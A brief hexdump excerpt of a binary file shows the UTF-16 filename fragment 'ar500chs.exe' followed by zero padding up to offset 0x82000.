000813d0  61 00 72 00 35 00 30 00  30 00 63 00 68 00 73 00  |a.r.5.0.0.c.h.s.|
000813e0  2e 00 65 00 78 00 65 00  00 00 00 00 00 00 00 00  |..e.x.e.........|
000813f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00082000